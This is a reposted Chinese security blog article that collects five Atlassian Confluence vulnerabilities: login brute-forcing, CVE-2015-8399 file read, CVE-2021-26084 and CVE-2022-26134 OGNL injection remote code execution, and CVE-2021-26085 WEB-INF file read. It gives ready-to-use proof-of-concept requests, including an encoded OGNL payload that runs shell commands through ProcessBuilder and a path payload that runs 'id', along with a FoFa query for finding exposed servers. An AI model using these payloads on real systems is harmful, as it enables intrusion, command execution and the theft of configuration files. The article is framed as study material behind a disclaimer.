Atlassian Confluence漏洞合集

admin 2023年9月11日09:46:00评论63 views字数 3646阅读12分9秒阅读模式

点击上方[蓝字],关注我们

建议大家把公众号“Z2O安全攻防”设为星标,否则可能就看不到啦!因为公众号现在只对常读和星标的公众号才能展示大图推送。操作方法:点击右上角的【...】,然后点击【设为星标】即可。

Atlassian Confluence漏洞合集

免责声明

本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者及本公众号不为此承担任何责任。

文章正文

1 概述

Atlassian Confluence是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。。该软件可实现团队成员之间的协作和知识共享。

一共复现5个漏洞:暴力破解、CVE-2015-8399任意文件读取、CVE-2021-26084远程代码执行、CVE-2021-26085受限的文件读取、CVE-2022-26134 OGNL注入命令执行。

FoFa语法:app="ATLASSIAN-Confluence"

2详情

2.1暴力破解

Web界面如下,抓取登录数据包可进行用户名和密码进行穷举,状态码为302的暴破成功的。

Atlassian Confluence漏洞合集
Atlassian Confluence漏洞合集

2.2 CVE-2015-8399任意文件读取

Atlassian Confluence 5.8.17之前版本中存在安全,该漏洞源于spaces/viewdefaultdecorator.action和admin/viewdefaultdecorator.action两个文件没有充分过滤decoratorName参数。远程攻击者可利用该漏洞读取配置文件。

利用该漏洞需要登录系统

POC:http://www.xxx.com/spaces/viewdefaultdecorator.action?decoratorName=file:///etc/passwd

decoratorName=/WEB-INF/web.xml 读取配置文件。

Atlassian Confluence漏洞合集

decoratorName=/或.,可查看目录文件

Atlassian Confluence漏洞合集
Atlassian Confluence漏洞合集

decoratorName=文件名,可直接读取文件内容

Atlassian Confluence漏洞合集

2.3 CVE-2021-26084远程代码执行

CVE-2021-26084即是Atlassian Confluence OGNL表达式注入代码执行漏洞,版本小于7.13.0,有多个接口存在这个OGNL表达式注入漏洞,重点关注以下三个路径。

在无需登录的情况下,访问/pages/doenterpagevariables.action或/pages/createpage-entervariables.action,如果存在,说明存在该漏洞。在登录状态下(需要是管理员或有权限访问/admin/console.action),访问/pages/createpage.action,也可进行漏洞利用。

http://www.xxx.com/pages/doenterpagevariables.action

Atlassian Confluence漏洞合集
Atlassian Confluence漏洞合集

http://www.xxx.com /pages/createpage-entervariables.action

Atlassian Confluence漏洞合集

使用如下数据包进行再次验证漏洞

POST /pages/doenterpagevariables.action HTTP/1.1

queryString=%5cu0027%2b%7b2*233%7d%2b%5cu0027
Atlassian Confluence漏洞合集

使用如下数据包进行执行命令

queryString=%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027JavaScript%5cu0027%29.%5cu0065val%28%5cu0027var+isWin+%3d+java.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3b+var+cmd+%3d+new+java.lang.String%28%5cu0022ifconfig%5cu0022%29%3bvar+p+%3d+new+java.lang.ProcessBuilder%28%29%3b+if%28isWin%29%7bp.command%28%5cu0022cmd.exe%5cu0022%2c+%5cu0022%2fc%5cu0022%2c+cmd%29%3b+%7d+else%7bp.command%28%5cu0022bash%5cu0022%2c+%5cu0022-c%5cu0022%2c+cmd%29%3b+%7dp.redirectErrorStream%28true%29%3b+var+process%3d+p.start%28%29%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3b+var+bufferedReader+%3d+new+java.io.BufferedReader%28inputStreamReader%29%3b+var+line+%3d+%5cu0022%5cu0022%3b+var+output+%3d+%5cu0022%5cu0022%3b+while%28%28line+%3d+bufferedReader.readLine%28%29%29+%21%3d+null%29%7boutput+%3d+output+%2b+line+%2b+java.lang.Character.toString%2810%29%3b+%7d%5cu0027%29%7d%2b%5cu0027
Atlassian Confluence漏洞合集
Atlassian Confluence漏洞合集

可直接利用脚本进行执行命令

Atlassian Confluence漏洞合集

2.4 CVE-2021-26085受限的文件读取

/s/路径是Atlassian产品通用的访问静态资源的方式,Confluence有一个正则用于避免WEB-INF和META-INF目录下文件被读取,CVE-2021-26085可以通过url编码绕过这个正则,实现WEB-INF和META-INF目录下的文件读取。

POC:/s/随机字符/_/;/WEB-INF/web.xml

http://www.xxx.com/s/666/_/;/WEB-INF/web.xml

Atlassian Confluence漏洞合集
Atlassian Confluence漏洞合集
Atlassian Confluence漏洞合集

2.5 CVE-2022-26134 OGNL注入命令执行

Confluence OGNL 注入漏洞,查看返回数据包X-Cmd-Response字段内容

漏洞POC

/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/
Atlassian Confluence漏洞合集
Atlassian Confluence漏洞合集

可直接利用脚本进行执行命令

Atlassian Confluence漏洞合集



https://www.cnblogs.com/NoId/p/16573825.htmlauthor:NoId

技术交流

知识星球

致力于红蓝对抗,实战攻防,星球不定时更新内外网攻防渗透技巧,以及最新学习研究成果等。常态化更新最新安全动态。专题更新奇技淫巧小Tips及实战案例。

涉及方向包括Web渗透、免杀绕过、内网攻防、代码审计、应急响应、云安全。星球中已发布 480+ 安全资源,针对网络安全成员的普遍水平,并为星友提供了教程、工具、POC&EXP以及各种学习笔记等等。(点我了解详情)

Atlassian Confluence漏洞合集


学习圈子

一个引导大家一起成长,系统化学习的圈子。如果看到这里的师傅是基础不够扎实/技术不够全面/入行安全不久/有充足时间的初学者...其中之一,那么欢迎加入我们的圈子。在圈子内会每周规划学习任务,提供资料、技术文档,供大家一起学习、交流,由浅入深、层层递进。(点我了解详情

Atlassian Confluence漏洞合集

交流群

关注公众号回复“加群”,添加Z2OBot好友,自动拉你加入Z2O安全攻防交流群(微信群)分享更多好东西。(QQ群可直接扫码添加)

Atlassian Confluence漏洞合集

Atlassian Confluence漏洞合集

关注我们

关注福利:

回复“app" 获取  app渗透和app抓包教程

回复“渗透字典" 获取 针对一些字典重新划分处理,收集了几个密码管理字典生成器用来扩展更多字典的仓库。

回复“书籍" 获取 网络安全相关经典书籍电子版pdf

回复“资料" 获取 网络安全、渗透测试相关资料文档


点个【 在看 】,你最好看



原文始发于微信公众号(Z2O安全攻防):Atlassian Confluence漏洞合集

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年9月11日09:46:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Atlassian Confluence漏洞合集http://cn-sec.com/archives/2023881.html

发表评论

匿名网友 填写信息